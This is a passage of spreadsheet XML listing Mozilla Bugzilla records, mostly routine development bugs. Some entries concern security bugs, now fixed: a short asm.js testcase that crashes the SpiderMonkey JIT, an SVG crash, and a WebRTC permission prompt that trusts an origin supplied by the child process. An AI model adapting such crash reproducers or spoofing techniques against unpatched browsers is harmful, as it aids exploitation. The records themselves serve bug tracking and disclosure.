      <c r="X6364" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6365">
      <c r="A6365" t="n">
        <v>1271256</v>
      </c>
      <c r="B6365" t="inlineStr">
        <is>
          <t>2016-05-09 05:01:53 -0700</t>
        </is>
      </c>
      <c r="C6365" t="inlineStr">
        <is>
          <t>Fix always passing tests in test_throttling.py</t>
        </is>
      </c>
      <c r="D6365" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E6365" t="n">
        <v>1</v>
      </c>
      <c r="F6365" t="n">
        <v>1</v>
      </c>
      <c r="G6365" t="n">
        <v>7</v>
      </c>
      <c r="H6365" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6365" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6365" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6365" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6365" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6365" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6365" t="inlineStr"/>
      <c r="Q6365" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6365" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6365" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6365" t="n">
        <v>1</v>
      </c>
      <c r="U6365" t="n">
        <v>0</v>
      </c>
      <c r="V6365" t="n">
        <v>4</v>
      </c>
      <c r="W6365" t="inlineStr">
        <is>
          <t>Several of the expected-actual comparisons in test_throttling.py don't use `assert` so will always pass.</t>
        </is>
      </c>
      <c r="X6365" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6366">
      <c r="A6366" t="n">
        <v>881433</v>
      </c>
      <c r="B6366" t="inlineStr">
        <is>
          <t>2013-06-10 13:11:08 -0700</t>
        </is>
      </c>
      <c r="C6366" t="inlineStr">
        <is>
          <t>Implement topics to be product specific</t>
        </is>
      </c>
      <c r="D6366" t="inlineStr">
        <is>
          <t>2013-06-13 14:20:13 -0700</t>
        </is>
      </c>
      <c r="E6366" t="n">
        <v>1</v>
      </c>
      <c r="F6366" t="n">
        <v>1</v>
      </c>
      <c r="G6366" t="n">
        <v>5</v>
      </c>
      <c r="H6366" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6366" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J6366" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K6366" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6366" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6366" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6366" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6366" t="inlineStr">
        <is>
          <t>u=user c=wiki p=3 s=2013.12</t>
        </is>
      </c>
      <c r="Q6366" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6366" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6366" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T6366" t="n">
        <v>1</v>
      </c>
      <c r="U6366" t="n">
        <v>0</v>
      </c>
      <c r="V6366" t="n">
        <v>9</v>
      </c>
      <c r="W6366" t="inlineStr">
        <is>
          <t>Our topics currently are currently shared among all the products. This is causing issues as we introduce new products that aren't so similar to the existing ones.
Let's implement a new topic model. It should be the same one as the current one with a Foreign Key to a Product. This way each product will have it's own topic tree.
Some details:
* We need to keep the current topics in place for now.
* Add a waffle flag to switch between the old topics and the new ones.
* Implement the new Topic model in the products app. We can delete the topics app when we are done with the old topics.
* Add the new topics to the Edit Document form without it becoming a mess.
* Include the union of both sets of topic slugs in the search index.
* Create an initial migration of the topics and article to topic mappings.</t>
        </is>
      </c>
      <c r="X6366" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6367">
      <c r="A6367" t="n">
        <v>792857</v>
      </c>
      <c r="B6367" t="inlineStr">
        <is>
          <t>2012-09-20 08:29:23 -0700</t>
        </is>
      </c>
      <c r="C6367" t="inlineStr">
        <is>
          <t>SVG text on path + setting a style crashes Firefox</t>
        </is>
      </c>
      <c r="D6367" t="inlineStr">
        <is>
          <t>2013-03-18 13:09:44 -0700</t>
        </is>
      </c>
      <c r="E6367" t="n">
        <v>1</v>
      </c>
      <c r="F6367" t="n">
        <v>1</v>
      </c>
      <c r="G6367" t="n">
        <v>3</v>
      </c>
      <c r="H6367" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6367" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6367" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K6367" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L6367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6367" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6367" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+][fixed by bug 786740]</t>
        </is>
      </c>
      <c r="Q6367" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6367" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6367" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6367" t="n">
        <v>1</v>
      </c>
      <c r="U6367" t="n">
        <v>0</v>
      </c>
      <c r="V6367" t="n">
        <v>42</v>
      </c>
      <c r="W6367" t="inlineStr">
        <is>
          <t>Created attachment 663025
crashff.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Build ID: 20120908010631
Steps to reproduce:
Start with SVG with text on a path. Make sure there is an earlier sibling in the svg's parent element. Set a parent container to have a relative position. Firefox crashes.
Pull up the attached html file and click "Crash Firefox" to reproduce it.
Actual results:
Firefox crashes. A cursory look in gdb indicates it's somewhere deep in the xul libraries.
Reproduced on Firefox 15.0.1 Linux and Mac and Firefox 16b3 Linux.
Expected results:
The style should be set correctly and Firefox does not crash.</t>
        </is>
      </c>
      <c r="X6367" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6368">
      <c r="A6368" t="n">
        <v>371816</v>
      </c>
      <c r="B6368" t="inlineStr">
        <is>
          <t>2007-02-26 13:24:24 -0800</t>
        </is>
      </c>
      <c r="C6368" t="inlineStr">
        <is>
          <t>tinderbox client: make the users/keys configurable for connecting to different services (stage/symbols/AUS)</t>
        </is>
      </c>
      <c r="D6368" t="inlineStr">
        <is>
          <t>2013-07-16 09:48:45 -0700</t>
        </is>
      </c>
      <c r="E6368" t="n">
        <v>1</v>
      </c>
      <c r="F6368" t="n">
        <v>1</v>
      </c>
      <c r="G6368" t="n">
        <v>5</v>
      </c>
      <c r="H6368" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6368" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J6368" t="inlineStr">
        <is>
          <t>RelOps: General</t>
        </is>
      </c>
      <c r="K6368" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6368" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6368" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6368" t="inlineStr"/>
      <c r="Q6368" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6368" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6368" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6368" t="n">
        <v>1</v>
      </c>
      <c r="U6368" t="n">
        <v>0</v>
      </c>
      <c r="V6368" t="n">
        <v>11</v>
      </c>
      <c r="W6368" t="inlineStr">
        <is>
          <t>The tinderbox scripts currently make some assumptions about which users/keys are used to connect to the various services, e.g. aus key used to connect to AUS server for uploading updates, connecting to stage as cltbld. etc.
As we open up these services up to community tinderboxes, we will need to add some configuration options for which keys to use for each service. In every case, it *should* be the same build key used for CVS access, but this key will be different per product, hence the need for the new config options.
The first step will be to audit the existing tinderbox code to see where these changes need to be made. Searching for 'cltbld' would be a good first step.</t>
        </is>
      </c>
      <c r="X6368" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6369">
      <c r="A6369" t="n">
        <v>496011</v>
      </c>
      <c r="B6369" t="inlineStr">
        <is>
          <t>2009-06-02 14:27:23 -0700</t>
        </is>
      </c>
      <c r="C6369" t="inlineStr">
        <is>
          <t>Crash [@ nsTextControlFrame::CalcIntrinsicSize] with execCommand inserthtml {ib} and undo</t>
        </is>
      </c>
      <c r="D6369" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E6369" t="n">
        <v>1</v>
      </c>
      <c r="F6369" t="n">
        <v>1</v>
      </c>
      <c r="G6369" t="n">
        <v>3</v>
      </c>
      <c r="H6369" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6369" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6369" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K6369" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6369" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6369" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6369" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6369" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q6369" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6369" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6369" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T6369" t="n">
        <v>1</v>
      </c>
      <c r="U6369" t="n">
        <v>0</v>
      </c>
      <c r="V6369" t="n">
        <v>28</v>
      </c>
      <c r="W6369" t="inlineStr">
        <is>
          <t>Created attachment 381150
testcase (crashes Firefox when loaded)
Null deref [@ nsTextControlFrame::CalcIntrinsicSize]</t>
        </is>
      </c>
      <c r="X6369" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6370">
      <c r="A6370" t="n">
        <v>673716</v>
      </c>
      <c r="B6370" t="inlineStr">
        <is>
          <t>2011-07-23 11:18:11 -0700</t>
        </is>
      </c>
      <c r="C6370" t="inlineStr">
        <is>
          <t>caminobrowser.org is down</t>
        </is>
      </c>
      <c r="D6370" t="inlineStr">
        <is>
          <t>2011-07-24 17:20:38 -0700</t>
        </is>
      </c>
      <c r="E6370" t="n">
        <v>1</v>
      </c>
      <c r="F6370" t="n">
        <v>1</v>
      </c>
      <c r="G6370" t="n">
        <v>6</v>
      </c>
      <c r="H6370" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6370" t="inlineStr">
        <is>
          <t>Camino Graveyard</t>
        </is>
      </c>
      <c r="J6370" t="inlineStr">
        <is>
          <t>Product Site</t>
        </is>
      </c>
      <c r="K6370" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6370" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6370" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6370" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6370" t="inlineStr"/>
      <c r="Q6370" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6370" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6370" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6370" t="n">
        <v>1</v>
      </c>
      <c r="U6370" t="n">
        <v>0</v>
      </c>
      <c r="V6370" t="n">
        <v>4</v>
      </c>
      <c r="W6370" t="inlineStr">
        <is>
          <t>I'm filing this bug retroactively in case there's fall out from fixing it.
Camino's website was down this morning for an undetermined about of time. I've since restarted Apache and everything appears to be functioning normally. I can't find a cause for why it went down, unfortunately. SSL is functioning normally now as well. (I tested both updates and browsing the site over SSL).
Please let me know if you find something not functioning properly.</t>
        </is>
      </c>
      <c r="X6370" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6371">
      <c r="A6371" t="n">
        <v>1446101</v>
      </c>
      <c r="B6371" t="inlineStr">
        <is>
          <t>2018-03-15 12:02:03 -0700</t>
        </is>
      </c>
      <c r="C6371" t="inlineStr">
        <is>
          <t>Convert all tabs popup to photon panel</t>
        </is>
      </c>
      <c r="D6371" t="inlineStr">
        <is>
          <t>2023-09-16 21:29:27 -0700</t>
        </is>
      </c>
      <c r="E6371" t="n">
        <v>1</v>
      </c>
      <c r="F6371" t="n">
        <v>1</v>
      </c>
      <c r="G6371" t="n">
        <v>2</v>
      </c>
      <c r="H6371" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6371" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6371" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K6371" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L6371" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6371" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6371" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6371" t="inlineStr"/>
      <c r="Q6371" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6371" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6371" t="inlineStr">
        <is>
          <t>Firefox 62</t>
        </is>
      </c>
      <c r="T6371" t="n">
        <v>1</v>
      </c>
      <c r="U6371" t="n">
        <v>74</v>
      </c>
      <c r="V6371" t="n">
        <v>42</v>
      </c>
      <c r="W6371" t="inlineStr">
        <is>
          <t>The all tabs dropdown (the down arrow on overflow/hidden tabs) is currently a native popup. This should be updated to use the photon style panel.</t>
        </is>
      </c>
      <c r="X6371" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6372">
      <c r="A6372" t="n">
        <v>1562600</v>
      </c>
      <c r="B6372" t="inlineStr">
        <is>
          <t>2019-07-01 03:32:17 -0700</t>
        </is>
      </c>
      <c r="C6372" t="inlineStr">
        <is>
          <t>webrtcUI.jsm trusts the URI from the child process</t>
        </is>
      </c>
      <c r="D6372" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:16 -0800</t>
        </is>
      </c>
      <c r="E6372" t="n">
        <v>1</v>
      </c>
      <c r="F6372" t="n">
        <v>1</v>
      </c>
      <c r="G6372" t="n">
        <v>2</v>
      </c>
      <c r="H6372" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6372" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6372" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K6372" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6372" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6372" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6372" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main78+]</t>
        </is>
      </c>
      <c r="Q6372" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6372" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6372" t="inlineStr">
        <is>
          <t>Firefox 78</t>
        </is>
      </c>
      <c r="T6372" t="n">
        <v>1</v>
      </c>
      <c r="U6372" t="n">
        <v>0</v>
      </c>
      <c r="V6372" t="n">
        <v>13</v>
      </c>
      <c r="W6372" t="inlineStr">
        <is>
          <t>webrtcUI.jsm trusts the URI from the child process when constructing a permission prompt for WebRTC. The [principal](https://searchfox.org/mozilla-central/rev/29f8e6aebd2b2660b9c76858ccb0c6eaf35dd7aa/browser/modules/webrtcUI.jsm#411) used for security decisions is supplied as a string from the child, rather than obtaining a principal from message.target. I'm not sure if there is a reason for this (does message.target always equal aRequest.origin?) but currently there is not really any security that the parent enforces here: a content process can just pick an aRequest.Origin that already has WebRTC permissions (if one exists?)
Note: In single content process world this probably made sense, but as we more towards Fission this likely needs to be improved. 
Taking a guess at sec rating - its probably sec-low here as exploiting it would require there to be an origin that already has permission for the attacker to take advatnage of. And obviously the attacker needs to compromise the child process first.</t>
        </is>
      </c>
      <c r="X6372" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6373">
      <c r="A6373" t="n">
        <v>944278</v>
      </c>
      <c r="B6373" t="inlineStr">
        <is>
          <t>2013-11-27 23:04:08 -0800</t>
        </is>
      </c>
      <c r="C6373" t="inlineStr">
        <is>
          <t>OdinMonkey: Crash [@ js::Invoke]</t>
        </is>
      </c>
      <c r="D6373" t="inlineStr">
        <is>
          <t>2014-01-30 23:01:29 -0800</t>
        </is>
      </c>
      <c r="E6373" t="n">
        <v>1</v>
      </c>
      <c r="F6373" t="n">
        <v>1</v>
      </c>
      <c r="G6373" t="n">
        <v>3</v>
      </c>
      <c r="H6373" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6373" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6373" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6373" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6373" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6373" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6373" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6373" t="inlineStr">
        <is>
          <t>[fuzzblocker][qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q6373" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6373" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6373" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T6373" t="n">
        <v>1</v>
      </c>
      <c r="U6373" t="n">
        <v>0</v>
      </c>
      <c r="V6373" t="n">
        <v>18</v>
      </c>
      <c r="W6373" t="inlineStr">
        <is>
          <t>Created attachment 8339785
debug and opt stacks
x = function() {}
m = []
x.toString = (function(a, foreign) {
    "use asm";
    var ff = foreign.ff
    function f() {
        +ff()
    }
    return f
})(this, {
    ff: function() {
        return RegExp("()")
    }
})
Object.defineProperty(m, 6, {
    value: x
})
m.join()
m.join()
m.join()
crashes 64-bit js debug and opt shell on m-c changeset 5eb1c89fc2bc with --ion-eager at js::Invoke.
s-s because this is one of the rare Windows crashes (it didn't seem to reproduce on Mac), setting needinfo from Luke due to it seeming to involve asm.js.
My configure flags are:
AR=ar sh ./configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --enable-more-deterministic --enable-threadsafe &lt;other NSPR options&gt;</t>
        </is>
      </c>
      <c r="X6373" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6374">
      <c r="A6374" t="n">
        <v>1514815</v>
      </c>
      <c r="B6374" t="inlineStr">
        <is>
          <t>2018-12-17 09:36:18 -0800</t>
        </is>
      </c>
      <c r="C6374" t="inlineStr">
        <is>
          <t>Console output doesn't stay stay scrolled to bottom</t>
        </is>
      </c>
      <c r="D6374" t="inlineStr">
        <is>
          <t>2018-12-26 16:44:56 -0800</t>
        </is>
      </c>
      <c r="E6374" t="n">
        <v>1</v>
      </c>
      <c r="F6374" t="n">
        <v>1</v>
      </c>
      <c r="G6374" t="n">
        <v>3</v>
      </c>
      <c r="H6374" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6374" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6374" t="inlineStr">
        <is>
          <t>Console</t>
        </is>
      </c>
      <c r="K6374" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L6374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6374" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6374" t="inlineStr"/>
      <c r="Q6374" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6374" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6374" t="inlineStr">
        <is>
          <t>Firefox 66</t>
        </is>
      </c>
      <c r="T6374" t="n">
        <v>1</v>
      </c>
      <c r="U6374" t="n">
        <v>0</v>
      </c>
      <c r="V6374" t="n">
        <v>16</v>
      </c>
      <c r="W6374" t="inlineStr">
        <is>
          <t>Created attachment 9031921
doesnt-stay-scrolled-down.gif
STR:
- Open https://nchevobbe.github.io/demo/console-test-app.html
- Click "Log Error" button until the console is filled, then some more
ER: Console output stays scrolled to bottom, always showing the last message.
AR: Scroll position isn't updated and position stays fixed at one position
Async resolution of stack traces doesn't update scroll position</t>
        </is>
      </c>
      <c r="X6374" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6375">
      <c r="A6375" t="n">
        <v>1490132</v>
      </c>
      <c r="B6375" t="inlineStr">
        <is>
          <t>2018-09-10 14:27:30 -0700</t>
        </is>
      </c>
      <c r="C6375" t="inlineStr">
        <is>
          <t>ci-admin is not publicly viewable</t>
        </is>
      </c>
      <c r="D6375" t="inlineStr">
        <is>
          <t>2018-09-10 19:45:27 -0700</t>
        </is>
      </c>
      <c r="E6375" t="n">
        <v>1</v>
      </c>
      <c r="F6375" t="n">
        <v>1</v>
      </c>
      <c r="G6375" t="n">
        <v>7</v>
      </c>
      <c r="H6375" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6375" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J6375" t="inlineStr">
        <is>
          <t>Phabricator</t>
        </is>
      </c>
      <c r="K6375" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6375" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6375" t="inlineStr"/>
      <c r="Q6375" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6375" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6375" t="n">
        <v>1</v>
      </c>
      <c r="U6375" t="n">
        <v>0</v>
      </c>
      <c r="V6375" t="n">
        <v>5</v>
      </c>
      <c r="W6375" t="inlineStr">
        <is>
          <t>Loading
  https://phabricator.services.mozilla.com/D5464
in a private browsing window shows "Log In or Register".  The log for the Rev says
phab-bot changed the visibility from "Custom Policy" to "Public (No Login Required)".
phab-bot changed the edit policy from "Custom Policy" to "bmo-editbugs-team (Project)".
so I'm guessing phab-bot has a bug?</t>
        </is>
      </c>
      <c r="X6375" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6376">
      <c r="A6376" t="n">
        <v>1354589</v>
      </c>
      <c r="B6376" t="inlineStr">
        <is>
          <t>2017-04-07 09:24:48 -0700</t>
        </is>
      </c>
      <c r="C6376" t="inlineStr">
        <is>
          <t>Implement OAuth2 on BMO</t>
        </is>
      </c>
      <c r="D6376" t="inlineStr">
        <is>
          <t>2020-02-18 13:44:21 -0800</t>
        </is>
      </c>
      <c r="E6376" t="n">
        <v>1</v>
      </c>
      <c r="F6376" t="n">
        <v>1</v>
      </c>
      <c r="G6376" t="n">
        <v>7</v>
      </c>
      <c r="H6376" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6376" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J6376" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K6376" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L6376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6376" t="inlineStr"/>
      <c r="Q6376" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6376" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6376" t="n">
        <v>1</v>
      </c>
      <c r="U6376" t="n">
        <v>0</v>
      </c>
      <c r="V6376" t="n">
        <v>8</v>
      </c>
      <c r="W6376" t="inlineStr">
        <is>
          <t>Notes for a possible implementation
- use OAuth::Lite2
- add oauth.cgi endpoint that just wraps PSGI app https://metacpan.org/pod/OAuth::Lite2::Server::Endpoint::Token
- Implement Bugzilla::OAuth::DataHandler as subclass of https://metacpan.org/pod/OAuth::Lite2::Server::DataHandler
- Implement Bugzilla::OAuth::AuthInfo objects
- Implement Bugzilla::OAuth::AccessToken, subclass of https://metacpan.org/pod/OAuth::Lite2::Model::AccessToken which will contain a Bugzilla::User::APIKey object.
- Wrap (conditionally?) rest.cgi with Plack::Middleware::Auth::OAuth2::ProtectedResource and poke at auth code to use this for authentication (really, just adapting what an oauth-client will be sending to the API keys).
Not going to estimate this right now, it's a decent amount of work but not to the level that implementing our own crappy auth.cgi system.</t>
        </is>
      </c>
      <c r="X6376" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6377">
      <c r="A6377" t="n">
        <v>482192</v>
      </c>
      <c r="B6377" t="inlineStr">
        <is>
          <t>2009-03-09 01:41:14 -0700</t>
        </is>
      </c>
      <c r="C6377" t="inlineStr">
        <is>
          <t>Website: Subheading text for uploading personas, step 1, is grammatically incorrect</t>
        </is>
      </c>
      <c r="D6377" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E6377" t="n">
        <v>1</v>
      </c>
      <c r="F6377" t="n">
        <v>1</v>
      </c>
      <c r="G6377" t="n">
        <v>6</v>
      </c>
      <c r="H6377" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6377" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J6377" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K6377" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6377" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6377" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6377" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6377" t="inlineStr"/>
      <c r="Q6377" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
